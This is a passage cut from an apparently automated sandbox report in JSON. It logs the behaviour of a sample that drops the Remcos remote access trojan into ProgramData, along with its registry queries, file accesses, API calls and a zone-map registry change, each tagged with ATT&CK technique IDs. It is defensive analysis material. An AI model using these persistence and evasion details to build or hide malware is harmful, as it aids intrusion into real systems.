\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLEAUT\"; Key: \"\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SETUP\"; Key: \"\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\"; Key: \"\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\"; Key: \"\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\\\"; Key: \"\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\\\"; Key: \"\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-159", "type": 6, "relevance": 1, "name": "Writes log files", "description": "\"remcos.exe\" writes a file \"C:\\ProgramData\\Remcos\\logs.dat\"\n \"remcos.exe\" writes a file \"%ALLUSERSPROFILE%\\Remcos\\logs.dat\"", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to touch file \"C:\\WINMM.dll\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to touch file \"C:\\Windows\\system32\\WINMM.dll\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to touch file \"C:\\version.DLL\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to touch file \"C:\\e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe.Local\\\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\\gdiplus.dll\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to touch file \"C:\\shcore.DLL\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to touch file \"C:\\Windows\\system32\\shcore.DLL\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to touch file \"C:\\Windows\\system\\shcore.DLL\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to touch file \"C:\\Windows\\shcore.DLL\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to touch file \"C:\\ProgramData\\Oracle\\Java\\javapath\\shcore.DLL\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to touch file \"C:\\Windows\\System32\\Wbem\\shcore.DLL\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to touch file \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\shcore.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to access non-existent file \"C:\\e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe.Local\\\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to access non-existent file \"C:\\ProgramData\\Remcos\\remcos.exe:Zone.Identifier\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to access non-existent file \"C:\\E7E2A03337C038A0B3C5ACA1BF4A2C369CB92A02CF6B1487FDEEAC3893671FA2.EXE.LOCAL\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to access non-existent file \"C:\\ProgramData\\Remcos\\remcos.exe:ZONE.IDENTIFIER\"\n \"remcos.exe\" trying to access non-existent file \"C:\\ProgramData\\Remcos\\remcos.exe.Local\\\"\n \"remcos.exe\" trying to access non-existent file \"\\Device\\RasAcd\"\n \"remcos.exe\" trying to access non-existent file \"C:\\ProgramData\\Remcos\\REMCOS.EXE.LOCAL\"\n \"remcos.exe\" trying to access non-existent file \"C:\\ProgramData\\Remcos\\LOGS.DAT\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" writes file \"c:\\programdata\\remcos\\remcos.exe\"\n \"remcos.exe\" writes file \"c:\\programdata\\remcos\\logs.dat\"\n \"remcos.exe\" writes file \"%allusersprofile%\\remcos\\logs.dat\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" writes file \"%allusersprofile%\\remcos\\remcos.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"remcos.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"logs.dat\" has type \"data\"- Location: [%ALLUSERSPROFILE%\\Remcos\\logs.dat]- [targetUID: 00000000-00001348]\n \"remcos.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%ALLUSERSPROFILE%\\Remcos\\remcos.exe]- [targetUID: 00000000-00002984]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SETUP\"; Key: \"SOURCEPATH\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\"; Key: \"DEVICEPATH\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"DATA\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"DATA\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"E7E2A03337C038A0B3C5ACA1BF4A2C369CB92A02CF6B1487FDEEAC3893671FA2\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"FindResourceA\" with parameter \"4639268\" - (UID: 00000000-00002984)\n \"remcos.exe\" called \"FindResourceA\" with parameter \"4639268\" - (UID: 00000000-00001348)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4690264'}\" (UID: 00000000-00002984)\n \"remcos.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4690264'}\" (UID: 00000000-00001348)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebc477a0df2d000090fd7f9a5cad7700f0fd7f00c612004490fd7f00000000400000003f000000200000000090fd7ff4c51200c15cad776082b477200000000090fd7f9a5cad7700f0fd7f18c612005789ac778083b4771317c375d8ebc477 (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002984)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "static-189", "relevance": 5, "name": "Calls an APIs used to retrieve process information", "description": "Observed import api \"OpenProcessToken\" which can be \"used to retrieve process information\" [Source: e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2]\n Observed import api \"OpenProcessToken\" which can be \"used to retrieve process information\" [Source: remcos.exe.bin]", "origin": "Static Parser", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"IsWow64Process\" with parameter \"2984\" - (UID: 00000000-00002984)\n \"remcos.exe\" called \"IsWow64Process\" with parameter \"1348\" - (UID: 00000000-00001348)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600dae9a10198da12006d82c77754a22c0004010000 (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000610030006200330063003500610063006100310062006600340061003200630033003600390063006200390032006100300032006300660036006200310034003800370066006400650065006100630033003800390033003600370031006600610032002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2bac7725d89577d8ebc477ac0129000000290000000000000000000800d400df030000000000000000000000000000000000000900cf00df0300000000000000000000d86f290000000000200000000000000000000000 (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ff2bac77d5fb95777ce71200cc01290000002900000000000000000018002201f10300000000000000000000000000001800000019001901f103000038f811001ce71200e0e61200000000008e00000030e71200feffffffb8e61200cf00ad77d600ad77ddfb95778e0000004700000030e71200000000008ce6120095e1a877 (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000051300000000000983300ab340000c028533000c4002900080c2e00003b0000000029000000000000513000dce812000464ac7738012900e063ac77b9f595770000000000002900085130006dd13176d797b5016cae18760000000000000000d8be9277dc3300efc40029000100000000002900500129000c0000000851300000000000020000001800000030000000b8e812000000000000000000030000007ce812003c6eac77000000000000000000000000d8a92b00c0753976d8a92b0000000000c075397698e8120079da31760000000002000000f0e81200ff2bac77 (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003100401331003b1331000000000000000000000029000000000114d912000000000078e6120095e1a8774d0f2b00feffffff435cac775059ac77aa000000b80000003a133100381331009cda1200d4de120000000000000000000000000000000000000000000000000000000000000000001c5cab7760d8c275ffffffff170000004cda120024000000030000003cdf120068e41200d4de12008600000078da120096edac7762133100a06a8275860000009cda1200d4de12000000000086008800a06a82759cda1200916c827562133100a06a8275a06a82750cdf120002020000 (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002984)\n \"remcos.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00001348)\n \"remcos.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00001348)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"remcos.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00002984)\n \"remcos.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00001348)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetForegroundWindow\" 